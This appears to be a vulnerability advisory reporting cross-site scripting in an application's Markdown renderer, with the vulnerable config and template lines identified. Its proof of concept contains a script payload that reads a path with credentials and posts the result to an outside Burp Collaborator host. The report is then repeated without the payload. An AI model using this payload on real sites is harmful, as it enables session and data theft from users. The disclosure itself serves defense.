Summary
A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including <script> tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.
Details
An attacker can craft malicious Markdown content containing <script> tags or event handlers (e.g., ![]()
). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim’s browser.
Vulnerable Components
config.js → markdownIt: { html: true } (Lines 26–30)
The Markdown renderer is explicitly configured to allow raw HTML.
lib/markd.js (Lines 33–58)
Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.
lib/pages/template.html
The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.
PoC
Create a pwn.md
# Hello
<script>
fetch('/etc/passwd', { credentials: 'include' })
.then(r => r.text())
.then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>
Open it on browser.
View the HTTP request in Burp Collaborator.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:
- Session hijacking
- Account takeover
- Credential theft
- Defacement or injection of malicious content
- Exfiltration of sensitive data via API tokens, CSRF tokens, or user information
This affects all users who can view Markdown content within the application.
References
kiwi865 Reporter
Summary
A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including <script> tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.
Details
An attacker can craft malicious Markdown content containing <script> tags or event handlers (e.g.,![]()
). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim’s browser.
Vulnerable Components
config.js → markdownIt: { html: true } (Lines 26–30)
The Markdown renderer is explicitly configured to allow raw HTML.
lib/markd.js (Lines 33–58)
Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.
lib/pages/template.html
The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.
PoC
Create a pwn.md
Open it on browser.
View the HTTP request in Burp Collaborator.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:
This affects all users who can view Markdown content within the application.
References